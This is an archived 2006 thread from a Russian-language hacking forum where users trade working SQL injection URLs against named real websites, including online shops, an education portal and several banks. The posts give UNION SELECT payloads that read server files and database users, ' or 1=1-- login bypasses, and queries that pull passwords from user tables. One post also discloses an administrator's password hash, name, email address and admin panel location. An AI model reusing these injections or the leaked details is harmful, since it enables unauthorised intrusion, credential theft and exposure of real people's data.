ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
31.10.2006, 13:01
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
И моя Гордость 
http://www.secureusmeds.com/prices~category~0+union+select+convert(%22null%22% 20using%20utf8),LOAD_FILE('C:/boot.ini')+from+users.asp
|
|
|
31.10.2006, 13:26
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Инет Магаз
http://apeks-msk.ru/category.php?id=-1+union+select+1,user(),3,4,5,6,7,8/*
Еще
http://antinomical.com/article/index.php?id_page=1+union+select+1,char(72,97,99,1 07,101,100,32,98,121,32,91,32,99,97,115,104,32,93) ,3,4,5,6,7/*
Последний раз редактировалось [ cash ]; 31.10.2006 в 13:30..
|
|
|
|
31.10.2006, 15:39
|
|
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825
Репутация:
4451
|
|
_http://edu.ru/index.php?page_id=10&action=viewcat&cat=7' - далее жмем на любой форум и видим
query failed: insert into nuke_referer values (NULL, '_http://edu.ru/index.php?page_id=10&action=viewcat&cat=7''):You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''_http://edu.ru/index.php?page_id=10&action=viewcat&cat=7'')' at
_http://www.srochno.mk.ru/article.asp?id=8324'
Пройдемся по банкам %)
_http://www.rs.ru/ru/index.php?id70=320'
_http://www.nationalbank.kz/?uid=9E21A7F6-802C-E8FB-3A9822E750174087&docid=178'
_http://www.trust.ru/common/promo_redirect.php?cid='13&lid=1&v=0&ul=L3J1L2luZG l2aWR1YWwvc2F2aW5ncy8=
_http://www.nbt.tj/?c=44&id=4'4&a=263'
_http://www.russlavbank.com/content.phtml?prcenter.newsdetail.276'
_http://www.sdm-bank.ru/news/20044'
_http://www.mtbank.ru/index.php?action='
_http://www.roscredit.ru/main/newsroom/news/38'
_http://www.forexpf.ru/forum/ - уязвим ( 2.1.6 rst exploit )
_http://www.paritate.ru/othernews/610301600'
|
|
|
|
01.11.2006, 04:36
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Ребят а есть ли смысл выкладывать тут иньекции без перебора полей... я есть ли выложить около тысячи.
Подставляя одинарную кавычку далеко не уйдешь имхо.
|
|
|
|
01.11.2006, 13:32
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
shop.liprom.ru
apace+win+mssql жесть...
http://shop.liprom.ru/index.php
post
login ' or 1=1--
pass ' or 1=1--
далле
http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945' +or+1=@@version--
http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945' +or+1=(select+system_user)--
http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945' +or+1=(select%20db_name())--
Далее
http://shop.liprom.ru/test/
post
login ' or 1=1--
pass ' or 1=1--
Ну и инклуд думаю все заметят... |
|
|
|
01.11.2006, 14:17
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Еще 1 шоп...
http://megagym.ru/show_cat2.php?grid=999+union+select+concat(user(), char(58),database(),char(58),version())/*
|
|
|
|
28.12.2006, 13:16
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591
Репутация:
123
|
|
Сообщение от _Pantera_
Разберем сайт www.megagym.ru
Для начала находим mysql хэш пароля админа
вот он: 0b1c68e72a1fc2c7
Далее вводим вот такой запрос
и получаем:
Разинков Александр:arazinkov@rambler.ru:3ead10984f 89f310
Вот тут админка:
http://megagym.ru/admin/
Только один нюанс таблица name - имя человека, а не логин.
Сам логин вроде хранится в столбце username.
http://lenta.auctyon.ru/photo/view.php?id=64')+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,12,14,15,16,17,18/*
отсюда можно что-нибудь путное вытащить?
Вот ещё пароли от форума и т.д.
http://www.spbclub.ru/forum2/index.php?topic_id=-1+union+select+concat(login,char(58),password,char (32,32,32,32,72,105,32,102,114,111,109,32,84,101,1 14,109,105,110,64,76)),2+from+users+limit+1,2/*
Помогите подобрать столбцы я блин до 60 набрал, ни фига
http://www.tour-info.ru/news/jvs_news.html?num=-1
Последний раз редактировалось Termin@L; 28.12.2006 в 19:23..
|
|
|
|
01.11.2006, 17:25
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
nationalbank.kz под sa запущен
http://www.nationalbank.kz/?uid=9E21A7F6-802C-E8FB-3A9822E750174087&docid=178+or+1=(select+system_use r)--
|
|
|
|
02.11.2006, 20:40
|
|
Участник форума
Регистрация: 30.10.2006
Сообщений: 238
Провел на форуме:
966901
Репутация:
444
|
|
http://www.oneills.ie/shop/index.asp?catID=-999+union+select+null--
|
|
|
|
02.11.2006, 20:47
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
В Microsoft JET Database Engine чисто по техническим причинам нельзя выполнить иньекцию в запрос...
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид